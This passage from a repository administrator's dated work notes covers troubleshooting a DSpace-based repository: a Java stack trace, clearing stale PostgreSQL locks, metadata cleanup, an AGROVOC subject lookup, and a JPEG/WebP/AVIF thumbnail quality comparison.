at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy198.generate(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy191.process(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy198.generate(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy191.process(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy198.generate(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy191.process(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy198.generate(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy191.process(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy198.generate(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy191.process(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy198.generate(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy191.process(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy198.generate(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy191.process(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy198.generate(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:439)
at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy191.process(Unknown Source)
at org.apache.cocoon.components.treeprocessor.sitemap.SerializeNode.invoke(SerializeNode.java:147)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
at org.apache.cocoon.components.treeprocessor.sitemap.MountNode.invoke(MountNode.java:117)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
at org.apache.cocoon.components.treeprocessor.sitemap.MountNode.invoke(MountNode.java:117)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
at org.apache.cocoon.servlet.RequestProcessor.process(RequestProcessor.java:351)
at org.apache.cocoon.servlet.RequestProcessor.service(RequestProcessor.java:169)
at org.apache.cocoon.sitemap.SitemapServlet.service(SitemapServlet.java:84)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:728)
at org.apache.cocoon.servletservice.ServletServiceContext$PathDispatcher.forward(ServletServiceContext.java:468)
at org.apache.cocoon.servletservice.ServletServiceContext$PathDispatcher.forward(ServletServiceContext.java:443)
at org.apache.cocoon.servletservice.spring.ServletFactoryBean$ServiceInterceptor.invoke(ServletFactoryBean.java:264)
at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172)
at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:204)
at com.sun.proxy.$Proxy186.service(Unknown Source)
at org.dspace.springmvc.CocoonView.render(CocoonView.java:113)
at org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1216)
at org.springframework.web.servlet.DispatcherServlet.processDispatchResult(DispatcherServlet.java:1001)
at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:945)
at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:867)
at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:951)
at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:853)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:647)
at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:827)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:728)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.dspace.app.xmlui.cocoon.SetCharacterEncodingFilter.doFilter(SetCharacterEncodingFilter.java:113)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter.doFilter(DSpaceCocoonServletFilter.java:160)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.dspace.app.xmlui.cocoon.servlet.multipart.DSpaceMultipartFilter.doFilter(DSpaceMultipartFilter.java:119)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.dspace.utils.servlet.DSpaceWebappServletFilter.doFilter(DSpaceWebappServletFilter.java:78)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:219)
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110)
at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:492)
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:165)
at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:104)
at org.apache.catalina.valves.CrawlerSessionManagerValve.invoke(CrawlerSessionManagerValve.java:235)
at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:1025)
at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:451)
at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1201)
at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:654)
at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:317)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
at java.lang.Thread.run(Thread.java:750)
```
- I don't see anything on the DSpace issue tracker or mailing list so I asked about it on the DSpace Slack...
- Peter said CGSpace was slow and I see a lot of locks from the XMLUI
- I looked and found many locks that were hours and days old, so I killed some:
```console
$ psql < locks-age.sql | grep -E "[[:digit:]] days" | awk -F\| '{print $10}' | sort -u
1050672
1053773
1054602
1054702
1056782
1057629
1057630
$ psql < locks-age.sql | grep -E "[[:digit:]] days" | awk -F\| '{print $10}' | sort -u | xargs kill
```
- I'm also running a `dspace cleanup -v`, but it doesn't seem to be finishing
- I recall that in DSpace 6 the errors show up in the logs rather than on the command line...
- I found it in the DSpace log:
```console
2023-04-17 21:09:46,004 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
Detail: Key (uuid)=(a7ddf477-1c04-4de0-9c7a-4d3c84a875bc) is still referenced from table "bundle".
```
- If I mark the primary bitstream as null manually the cleanup script continues until it finds a few more
- I ended up with a long list of UUIDs to fix before the script would complete:
```console
$ psql -d dspace -c "update bundle set primary_bitstream_id=NULL where primary_bitstream_id in ('a7ddf477-1c04-4de0-9c7a-4d3c84a875bc', '9582b661-9c2d-4c86-be22-c3b0942b646a', '210a4d5d-3af9-46f0-84cc-682dd1431762', '51115f07-0a60-4988-8536-b9ebd2a5e15e', '0fc5021d-3264-413a-b2e2-74bda38a394e', '4704fa62-b8ab-4dfe-b7aa-0e4905f8412a')"
```
- This process ended up taking a few days because each iteration ran for over four hours before failing on the next UUID, sighhhhh
## 2023-04-18
- Regarding the item Abenet noticed yesterday that has a blank page and a NullPointerException
- It appears OK on DSpace Test! https://dspacetest.cgiar.org/handle/10568/75611
- And according to the REST API on CGSpace the item was modified on 2023-04-11, so last week...
- According to the DSpace logs it was Francesca who edited the item last week, so I asked her for more information before I troubleshoot more
## 2023-04-19
- I fixed the Bioversity item by deleting the `9781138781276.jpg` bitstream via the REST API
- I *think* Francesca might have changed the "format" of it?
- Anyway, this item has a PDF so we have a proper thumbnail and don't need that other journal cover one
- I noticed a URL for this [Bioversity item](https://hdl.handle.net/10568/89049) redirects incorrectly
- I had mentioned this to Maria and Francesca a few months ago but it seems to never have been resolved
- The `dspace cleanup -v` finally finished after a few days of running and stopping...
- I decided to update the thumbnails in the Bioversity books collection because I saw a few old ones suffering from the CropBox issue
- Also, all day there's been a high load on CGSpace, with lots of locks in PostgreSQL
- I had been waiting until the bitstream cleanup finished... now I might need to restart PostgreSQL to kill some old locks as something needs to give
- I restarted PostgreSQL, but DSpace was still hanging on simple XMLUI options so I ended up restarting Tomcat
- Tag 544 ORCID identifiers with my script
- I updated my `generation-loss.sh` and `improved-dspace-thumbnails` scripts to include thirty-five PDFs from CGSpace (up from twenty-four) to get a larger sample
- Now starting to get some numbers comparing JPEG, WebP, and AVIF
- First, out of curiosity, I checked the average ssimulacra2 scores at Q75, Q80, and Q92 for each format:
| | Q75 | Q80 | Q92 |
|------|-----|-----|-----|
| JPEG | 71 | 74 | 88 |
| WebP | 74 | 77 | 82 |
| AVIF | 82 | 83 | 86 |
- Then I checked the quality and file size (bytes) needed to hit an average ssimulacra2 score of 80 with each format:
- **JPEG**: Q89, 124923 bytes
- **WebP**: Q86, 84662 bytes (33% smaller than JPEG size)
- **AVIF**: Q65, 67597 bytes (56% smaller than JPEG size)
- [Google's original WebP study](https://developers.google.com/speed/webp/docs/webp_study) uses this technique to compare WebP to JPEG too
- As the quality settings are not comparable between formats, we need to compare the formats at matching perceptual scores (ssimulacra2 in this case)
- I used a ssimulacra2 score of 80 because that's about the highest score I see with WebP using my samples, though JPEG and AVIF do go higher
- Also, according to current ssimulacra2 (v2.1), a score of 70 is "high quality" and a score of 90 is "very high quality", so 80 should be reasonably high enough...
- Here is a plot of the qualities and ssimulacra2 scores:
![Quality vs Score](/cgspace-notes/2023/04/quality-vs-score-ssimulacra-v2.1.png)
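- For reference, the core of this comparison is just encoding the same lossless reference image at a given quality in each format and scoring the decoded result against the reference; a minimal sketch (not my actual script), assuming a `reference.png` rendered from the PDF, ImageMagick built with WebP and AVIF delegates, and the `ssimulacra2` tool from libjxl:
```console
$ magick reference.png -quality 80 test.jpg
$ magick reference.png -quality 80 test.webp
$ magick reference.png -quality 80 test.avif
$ magick test.webp test-webp.png
$ ssimulacra2 reference.png test-webp.png
```
- (The decode back to PNG before scoring is shown for WebP only; the JPEG and AVIF results get the same treatment)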
- Export CGSpace to check for missing Initiatives mappings
## 2023-04-22
- Export the Initiatives collection to run it through csv-metadata-quality
- I wanted to make sure all the Initiatives items had correct regions
- I had to manually fix a few license identifiers and ISSNs
- Also, I found a few items submitted by MEL that had dates in DD/MM/YYYY format, so I sent them to Salem for him to investigate
- Start a harvest on AReS
## 2023-04-26
- Begin working on the list of non-AGROVOC CGSpace subjects for FAO
- The last time I did this was in 2022-06
- I used the following SQL query to dump values from all subject fields, lower case them, and group by counts:
```console
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(lower(text_value)) AS "subject", count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (187, 120, 210, 122, 215, 127, 208, 124, 128, 123, 125, 135, 203, 236, 238, 119) GROUP BY "subject" ORDER BY count DESC) to /tmp/2023-04-26-cgspace-subjects.csv WITH CSV HEADER;
COPY 26315
Time: 2761.981 ms (00:02.762)
```
- Then I extracted the subjects and looked them up against AGROVOC:
```console
$ csvcut -c subject /tmp/2023-04-26-cgspace-subjects.csv | sed '1d' > /tmp/2023-04-26-cgspace-subjects.txt
$ ./ilri/agrovoc_lookup.py -i /tmp/2023-04-26-cgspace-subjects.txt -o /tmp/2023-04-26-cgspace-subjects-results.csv
```
## 2023-04-27
- The AGROVOC lookup from yesterday finished, so I extracted all terms that did not match and joined them with the original CSV so I can see the counts:
- (I also note that the `agrovoc_lookup.py` script didn't seem to be caching properly, as it had to look up everything again the next time I ran it despite the requests cache being 174MB!)
```console
csvgrep -c 'number of matches' -r '^0$' /tmp/2023-04-26-cgspace-subjects-results.csv \
| csvcut -c subject \
| csvjoin -c subject /tmp/2023-04-26-cgspace-subjects.csv - \
> /tmp/2023-04-26-cgspace-non-agrovoc.csv
```
- I filtered for only those terms that had counts larger than fifty (a sketch of that filter is at the end of this section)
- I also removed terms like "forages", "policy", "pests and diseases" because those exist as singular or separate terms in AGROVOC
- I also removed ambiguous terms like "cocoa", "diversity", "resistance" etc because there are various other preferred terms for those in AGROVOC
- I also removed spelling mistakes like "modeling" and "savanas" because those exist in their correct form in AGROVOC
- I also removed internal CGIAR terms like "tac", "crp", "internal review" etc (note: these are mostly from CGIAR System Office's subjects... perhaps I should exclude those next time?)
- I note that many of *our* terms would match if they were singular, plural, or split up into separate terms, so perhaps we should pair this with an exercise to review our own terms
- I couldn't finish the work locally yet so I uploaded my list to Google Docs to continue later
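- A rough sketch of that count filter using csvkit's `csvsql` (assuming the joined CSV kept the `count` column from the original export; the output filename is just illustrative):
```console
$ csvsql --tables subjects --query 'SELECT subject, "count" FROM subjects WHERE "count" > 50' \
  /tmp/2023-04-26-cgspace-non-agrovoc.csv > /tmp/2023-04-26-cgspace-non-agrovoc-50plus.csv
```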
## 2023-04-28
- The ImageMagick CMYK issue is bothering me still
- I am on a plane currently, but I have a Docker image of ImageMagick 7.1.1-3 and I compared the output of all CMYK PDFs using the same command on my local machine
- The images from the Docker environment are correct with *only* `-colorspace sRGB` (no profiles!) as the commenters on GitHub said
- This leads me to believe something is wrong in my own environment, perhaps Ghostscript...?
- The container has Ghostscript 9.53.3~dfsg-7+deb11u2 from Debian 11, while my Arch Linux system has Ghostscript 10.01.1-1
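- The kind of command I was comparing in both environments was roughly this (a sketch; the sample filename, density, and output format are just illustrative):
```console
$ magick -density 144 cmyk-sample.pdf[0] -colorspace sRGB -flatten cmyk-sample.jpg
```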
<!-- vim: set sw=2 ts=2: -->

content/posts/2023-05.md
---
title: "May, 2023"
date: 2023-05-03T08:53:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2023-05-03
- Alliance's TIP team emailed me to ask about issues authenticating on CGSpace
- It seems their password expired, which is annoying
- I continued looking at the CGSpace subjects for the FAO / AGROVOC exercise that I started last week
- There are many of our subjects that would match if a hyphen were added (for example "high yielding varieties") or if they were singular...
- Also I found at least two spelling mistakes, for example "decison support systems", which would match if it was spelled correctly
- Work on cleaning, proofing, and uploading twenty-seven records for IFPRI to CGSpace
<!--more-->
- I notice there are a few dozen locks from the `dspaceWeb` pool that are five days old on CGSpace so I killed them
```console
$ psql < locks-age.sql | grep " days " | awk -F"|" '{print $10}' | sort -u | xargs kill
```
## 2023-05-04
- Sync DSpace Test with CGSpace
- I replaced one item's thumbnail with a WebP version and XMLUI displays it fine
- I spent some time checking the CMYK issue with Arch's ImageMagick 7 and the Docker container and I think ImageMagick 7 just handles CMYK wrong...
- libvips does it correctly automatically and looks closer to the PDF
- Meeting about CG Core types
## 2023-05-10
- Write a script to find the `metadata_field_id` values associated with the non-AGROVOC subjects I am working on for Sara
- This is useful because we want to know who to contact for a definition
- The script was:
```bash
while read -r subject; do
metadata_field_id=$(psql -h localhost -U postgres -d dspacetest -qtAX <<SQL
SELECT DISTINCT(metadata_field_id) FROM metadatavalue WHERE LOWER(text_value)='$subject'
SQL
)
metadata_field_id=$(echo $metadata_field_id | sed 's/[[:space:]]/||/g')
echo "$subject,$metadata_field_id"
done < <(csvcut -c 1 ~/Downloads/2023-04-26\ CGIAR\ non-AGROVOC\ subjects.csv | sed 1d)
```
- I also realized that Bernard Bett didn't have any items on CGSpace tagged with his ORCID identifier, so I tagged 230!
## 2023-05-11
- CG Core meeting
- Finalize looking at the CGSpace non-AGROVOC subjects for FAO
## 2023-05-12
- Export the Alliance community to do some country/region fixes
- I also sent Maria and Francesca the export because they want to add more regions and subregions
- Export the entire CGSpace to check for missing Initiative collection mappings
- I also added missing regions
## 2023-05-16
- I finally cleaned up and published my latest evaluation of [JPEG, WebP, and AVIF](https://alanorth.github.io/improved-dspace-thumbnails/evaluating-jpeg-webp-avif.html)
- I [filed an issue on DSpace](https://github.com/DSpace/DSpace/issues/8849) to track this
## 2023-05-17
- Re-sync CGSpace to DSpace 7 Test
- I came up with a naive patch to use WebP instead of JPEG in the DSpace ImageMagick filter, and it works, but doesn't replace existing JPEGs... hmmm
- Also, it does PDF to WebP to WebP haha
## 2023-05-18
- I created a [pull request](https://github.com/DSpace/DSpace/pull/8850) to improve some minor documentation, typo, and logic issues in the DSpace ImageMagick thumbnail filters
- I realized that there is a quick win to the generation loss issue with ImageMagickThumbnailFilter
- We can use ImageMagick's internal MIFF instead of JPEG when writing the intermediate image
- According to the [libvips author PNG is very slow](https://github.com/libvips/libvips/issues/571)!
- I re-ran my `generation-loss.sh` script using MIFF and found that it had essentially the same results as PNG, which is about 1.1 points higher on the ssimulacra2 (v2.1) scoring scale
- Also, according to my tests with the cosmo rusage.com utility, I see that MIFF is indeed much faster than PNG
- I updated my pull request to add this quick win
- Weekly CG Core types meeting
- Low attendance so I just kept working on the spreadsheet
